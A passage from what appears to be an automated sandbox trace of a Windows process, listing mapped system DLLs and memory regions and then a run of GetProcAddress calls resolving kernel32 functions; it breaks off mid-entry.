"\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1761 start_va = 0x75520000 end_va = 0x7557efff monitored = 0 entry_point = 0x75524af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1762 start_va = 0x77640000 end_va = 0x77652fff monitored = 0 entry_point = 0x77641d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1763 start_va = 0x71e20000 end_va = 0x71e34fff monitored = 0 entry_point = 0x71e25210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1764 start_va = 0x74690000 end_va = 0x74807fff monitored = 0 entry_point = 0x746e8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1765 start_va = 0x75900000 end_va = 0x7590dfff monitored = 0 entry_point = 0x75905410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1766 start_va = 0x75820000 end_va = 0x75825fff monitored = 0 entry_point = 0x75821460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1767 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1768 start_va = 0x660000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1769 start_va = 0x20d0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1770 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1771 start_va = 0x75310000 end_va = 0x75393fff monitored = 0 entry_point = 0x75336220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1772 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1773 start_va = 0x71e00000 end_va = 0x71e14fff monitored = 0 entry_point = 0x71e0e570 region_type = mapped_file name = "devenum.dll" filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll") Region: id = 1774 start_va = 0x71dd0000 end_va = 0x71df3fff monitored = 0 entry_point = 0x71dd4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1775 start_va = 0x71d00000 end_va = 0x71d22fff monitored = 0 entry_point = 0x71d08940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 1776 start_va = 0x6a0000 end_va = 0x6a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1777 start_va = 0x77070000 end_va = 0x7747afff monitored = 0 entry_point = 0x7709adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1778 start_va = 0x71cd0000 end_va = 0x71cf7fff monitored = 0 entry_point = 0x71cd7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1779 start_va = 0x72570000 end_va = 0x72591fff monitored = 0 entry_point = 0x725791f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1780 start_va = 0x758b0000 end_va = 0x758f1fff monitored = 0 entry_point = 0x758c6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1781 start_va = 0x71dc0000 end_va = 0x71dc8fff monitored = 0 entry_point = 0x71dc29b0 region_type = mapped_file name = "msdmo.dll" filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll") Region: id = 1782 start_va = 0x71cb0000 end_va = 0x71cc3fff monitored = 0 entry_point = 0x71cbe190 region_type = mapped_file name = "avicap32.dll" filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll") Region: id = 1783 start_va = 0x71c80000 end_va = 0x71ca2fff monitored = 0 entry_point = 0x71c933e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 1784 start_va = 0x71be0000 end_va = 0x71c71fff monitored = 0 entry_point = 0x71bedd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1785 start_va = 0x2d50000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 1786 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1787 start_va = 0x2d50000 end_va = 0x2e0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Region: id = 1788 start_va = 0x2e10000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1789 start_va = 0x6b0000 end_va = 0x6b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1790 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1791 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1792 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1793 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 1794 start_va = 0x700000 end_va = 0x702fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "avicap32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui") Region: id = 1795 start_va = 0x2e20000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 1796 start_va = 0x710000 end_va = 0x716fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1797 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1798 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1799 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1800 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1801 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1802 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1803 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1804 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1805 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1806 start_va = 0x700000 end_va = 0x700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1807 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1808 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1809 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1810 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1811 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1812 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1813 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1814 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1815 start_va = 0x2ea0000 end_va = 0x31d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1816 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1817 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1818 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1819 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1820 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1821 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1822 start_va = 0x2e10000 end_va = 0x2e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1823 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1824 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1825 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1826 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1827 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1828 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1829 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1830 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1831 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1832 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1833 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1834 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1835 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1836 start_va = 0x2e10000 end_va = 0x2e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1837 start_va = 0x31f0000 end_va = 0x31f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1838 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1839 start_va = 0x2e10000 end_va = 0x2e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1840 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1841 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1842 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1843 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1844 start_va = 0x3200000 end_va = 0x360bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1845 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1846 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1847 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1848 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1849 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1850 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1851 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1852 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1853 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1854 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1855 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1856 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1857 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 1858 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1859 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1860 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1861 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1862 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1863 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1864 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1865 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 1866 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1867 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 1868 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1869 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 1870 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1871 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 1872 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1873 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 1874 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1875 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 1876 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1877 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 1878 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1879 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1880 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 1881 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1882 start_va = 0x3710000 end_va = 0x3710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 1883 start_va = 0x3720000 end_va = 0x3720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 1884 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003730000" filename = "" Region: id = 1903 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1904 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 1905 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1906 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1907 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1908 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 1909 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1910 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1911 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1912 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1913 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 1914 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 1915 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1916 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Thread: id = 57 os_tid = 0xfa4 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpiA") returned 0x74ca7830 [0284.982] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="IsDBCSLeadByte") returned 0x74cac990 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="HeapCreate") returned 0x74caa100 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="HeapSetInformation") returned 0x74caa8e0 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="InitOnceExecuteOnce") returned 0x75b7c2d0 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74cb6730 [0284.983] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeSListHead") returned 0x777c5f60 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="IsDebuggerPresent") returned 0x74cab0b0 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="IsProcessorFeaturePresent") returned 0x74ca9bf0 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidCodePage") returned 0x74caa790 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="IsValidLocale") returned 0x74caab40 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetPerformanceInfo") returned 0x74cd16e0 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="K32GetProcessMemoryInfo") returned 0x74cd1740 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="K32QueryWorkingSetEx") returned 0x74cd17c0 [0284.984] GetProcAddress (hModule=0x74c90000, lpProcName="LCMapStringW") returned 0x74ca9f30 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExA") returned 0x74caa270 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="LockFileEx") returned 0x74cb6b90 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="MapViewOfFile") returned 0x74ca8d60 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="MoveFileW") returned 0x74cab1d0 [0284.985] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringA") returned 0x74cafde0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="OutputDebugStringW") returned 0x74cd19a0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="PostQueuedCompletionStatus") returned 0x74caa880 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="ProcessIdToSessionId") returned 0x74ca8fa0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="QueryDosDeviceW") returned 0x74cb6ba0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceCounter") returned 0x74ca38a0 [0284.986] GetProcAddress (hModule=0x74c90000, lpProcName="QueryPerformanceFrequency") returned 0x74ca8cc0 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="QueryThreadCycleTime") returned 0x74caf2e0 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="ReadConsoleW") returned 0x74cb6fe0 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="ReadProcessMemory") returned 0x74cd1c80 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="RegisterWaitForSingleObject") returned 0x74ca9f70 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSRWLockExclusive") returned 0x777ad080 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseSemaphore") returned 0x74cb67b0 [0284.987] GetProcAddress (hModule=0x74c90000, lpProcName="RemoveDirectoryW") returned 0x74cb6bf0 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="ReplaceFileW") returned 0x74cb4f60 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="ResetEvent") returned 0x74cb67c0 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="ResumeThread") returned 0x74caa800 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureContext") returned 0x74cb6290 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="RtlCaptureStackBackTrace") returned 0x74cacc80 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="RtlUnwind") returned 0x74ca8c10 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="SearchPathW") returned 0x74cae790 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="SetConsoleCtrlHandler") returned 0x74cb6ff0 [0284.988] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetEndOfFile") returned 0x74cb6c00 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetEnvironmentVariableW") returned 0x74cae9e0 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetFileAttributesW") returned 0x74cb6c20 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointerEx") returned 0x74cb6c50 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetHandleInformation") returned 0x74cb6660 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetInformationJobObject") returned 0x74cdbd30 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetNamedPipeHandleState") returned 0x74cd2390 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetProcessShutdownParameters") returned 0x74cafd70 [0284.989] GetProcAddress (hModule=0x74c90000, lpProcName="SetStdHandle") returned 0x74cd2430 [0284.990] GetProcAddress (hModule=0x74c90000, lpProcName="SetThreadPriority") returned 0x74ca9990 [0284.990] GetProcAddress (hModule=0x74c90000, 